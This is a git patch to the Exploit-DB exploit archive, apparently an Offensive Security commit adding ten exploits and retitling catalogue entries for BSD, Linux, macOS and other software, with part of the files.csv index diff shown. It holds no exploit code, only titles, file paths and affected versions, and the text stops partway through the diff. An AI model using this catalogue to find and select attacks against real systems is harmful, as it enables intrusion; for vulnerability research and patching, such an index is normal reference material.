From 538da000af3558784bcbe4ac9430415443502ee0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 24 Oct 2017 05:02:00 +0000 Subject: [PATCH] DB: 2017-10-24 10 new exploits FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC) NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC) FreeBSD 6/8 - ata device Local Denial of Service FreeBSD 6/8 - ata Device Local Denial of Service FreeBSD 7.2 - pecoff executable Local Denial of Service FreeBSD 7.2 - 'pecoff' Local Denial of Service FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC) FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC) FreeBSD Kernel - 'mountnfs()' Exploit FreeBSD - 'mountnfs()' Exploit FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service OpenBSD 3.3/3.4 sysctl - Local Denial of Service OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service FreeBSD 9.1 ftpd - Remote Denial of Service FreeBSD 9.1 - 'ftpd' Remote Denial of Service FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow Multiple BSD Distributions - 'strfmon()' Integer Overflow BSD (Multiple Distributions) - 'strfmon()' Integer Overflow Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption Multiple BSD Distributions - 'printf(3)' Memory Corruption BSD (Multiple Distributions) - 'printf(3)' Memory Corruption FreeBSD Kernel - Multiple Vulnerabilities FreeBSD - Multiple Vulnerabilities FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation OpenBSD ftp - Exploit OpenBSD - 'ftp' Exploit FreeBSD /usr/bin/top - Format String FreeBSD - '/usr/bin/top' Format String FreeBSD 4.x / < 5.4 - master.passwd Disclosure FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation Oracle 10g - CTX_DOC.MARKUP SQL Injection Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection FreeBSD 6x/7 protosw Kernel - Privilege Escalation FreeBSD 6x/7 - 'protosw' Privilege Escalation FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation Multiple BSD Distributions - 'setusercontext()' Vulnerabilities BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities FreeBSD Kernel - 'nfs_mount()' Exploit FreeBSD - 'nfs_mount()' Exploit FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit Sun Solaris 7.0 sdtcm_convert - Exploit Sun Solaris 7.0 - 'sdtcm_convert' Exploit BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3) BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3) BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2) BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit FreeBSD 3.3 gdc - Buffer Overflow FreeBSD 3.3 gdc - Symlink Exploit FreeBSD 3.3 - Seyon setgid dialer FreeBSD 3.3 xmindpath - Buffer Overflow FreeBSD 3.3 angband - Buffer Overflow FreeBSD 3.3 - 'gdc' Buffer Overflow FreeBSD 3.3 - 'gdc' Symlink Exploit FreeBSD 3.3 - Seyon setgid Dialer FreeBSD 3.3 - 'xmindpath' Buffer Overflow FreeBSD 3.3 - 'angband' Buffer Overflow FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit BSD mailx 8.1.1-10 - Buffer Overflow (1) BSD mailx 8.1.1-10 - Buffer Overflow (2) BSD 'mailx' 8.1.1-10 - Buffer Overflow (1) BSD 'mailx' 8.1.1-10 - Buffer Overflow (2) OpenBSD 2.x - fstat Format String OpenBSD 2.x - 'fstat' Format String BSD lpr 0.54 -4 - Arbitrary Command Execution BSD 'lpr' 0.54 -4 - Arbitrary Command Execution FreeBSD 3.5/4.x /usr/bin/top - Format String FreeBSD 3.5/4.x - '/usr/bin/top' Format String Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2) BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1) BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2) BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1) BSD Kernel - SHMAT System Call Privilege Escalation BSD - SHMAT System Call Privilege Escalation Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation NetBSD mail.local(8) - Privilege Escalation (Metasploit) NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit) OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation Apple Mac OSX 10.10.5 - XNU Privilege Escalation Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit) Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit) NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006) NetBSD - 'mail.local(8)' Privilege Escalation Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation BSD TelnetD - Remote Command Execution (1) BSD - 'TelnetD' Remote Command Execution (1) ftpd / ProFTPd (FreeBSD) - Remote Command Execution FreeBSD - 'ftpd / ProFTPd' Remote Command Execution FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit) FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit) BSD 4.2 fingerd - Buffer Overflow BSD 4.2 - 'fingerd' Buffer Overflow BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2) BSD TelnetD - Remote Command Execution (2) BSD - 'TelnetD' Remote Command Execution (2) FreeBSD 3.x/4.x - ipfw Filtering Evasion FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow NetBSD 1.x TalkD - User Validation NetBSD 1.x - 'TalkD' User Validation tnftp - clientside BSD Exploit tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit Ayukov NFTP FTP Client < 2.0 - Buffer Overflow Unitrends UEB 9 - http api/storage Remote Root (Metasploit) Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit) Polycom - Command Shell Authorization Bypass (Metasploit) Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload TP-Link TL-MR3220 - Cross-Site Scripting Logitech Media Server - Cross-Site Scripting CometChat < 6.2.0 BETA 1 - Local File Inclusion Kaltura < 13.1.0 - Remote Code Execution --- files.csv | 194 +++++++++++---------- platforms/hardware/webapps/43023.txt | 25 +++ platforms/lin_x86/remote/43030.rb | 93 ++++++++++ platforms/lin_x86/remote/43031.rb | 119 +++++++++++++ platforms/linux/local/43029.c | 127 ++++++++++++++ platforms/multiple/webapps/43024.txt | 43 +++++ platforms/php/webapps/43027.txt | 60 +++++++ platforms/php/webapps/43028.py | 59 +++++++ platforms/unix/remote/43032.rb | 246 +++++++++++++++++++++++++++ platforms/windows/dos/43026.py | 62 +++++++ platforms/windows/remote/43025.py | 69 ++++++++ 11 files changed, 1005 insertions(+), 92 deletions(-) create mode 100755 platforms/hardware/webapps/43023.txt create mode 100755 platforms/lin_x86/remote/43030.rb create mode 100755 platforms/lin_x86/remote/43031.rb create mode 100755 platforms/linux/local/43029.c create mode 100755 platforms/multiple/webapps/43024.txt create mode 100755 platforms/php/webapps/43027.txt create mode 100755 platforms/php/webapps/43028.py create mode 100755 platforms/unix/remote/43032.rb create mode 100755 platforms/windows/dos/43026.py create mode 100755 platforms/windows/remote/43025.py diff --git a/files.csv b/files.csv index a13ae3266..8cec67b1b 100644 --- a/files.csv +++ b/files.csv @@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - 'RCPT TO' Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 -2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 +2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 @@ -422,7 +422,7 @@ id,file,description,date,author,platform,type,port 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 -2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0 +2874,platforms/bsd/dos/2874.pl,"NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 @@ -1099,7 +1099,7 @@ id,file,description,date,author,platform,type,port 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0 -9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 +9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata Device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 @@ -1118,7 +1118,7 @@ id,file,description,date,author,platform,type,port 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 -9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - pecoff executable Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 +9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 @@ -1425,7 +1425,7 @@ id,file,description,date,author,platform,type,port 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0 -11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 +11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 @@ -1566,7 +1566,7 @@ id,file,description,date,author,platform,type,port 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 +12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 @@ -1603,7 +1603,7 @@ id,file,description,date,author,platform,type,port 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0 -14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 +14003,platforms/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 14032,platforms/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 @@ -1707,7 +1707,7 @@ id,file,description,date,author,platform,type,port 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 -14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 +14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 @@ -2291,7 +2291,7 @@ id,file,description,date,author,platform,type,port 19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0 19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0 -19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 +19423,platforms/bsd/dos/19423.c,"BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",hardware,dos,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos,0 @@ -2306,7 +2306,7 @@ id,file,description,date,author,platform,type,port 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 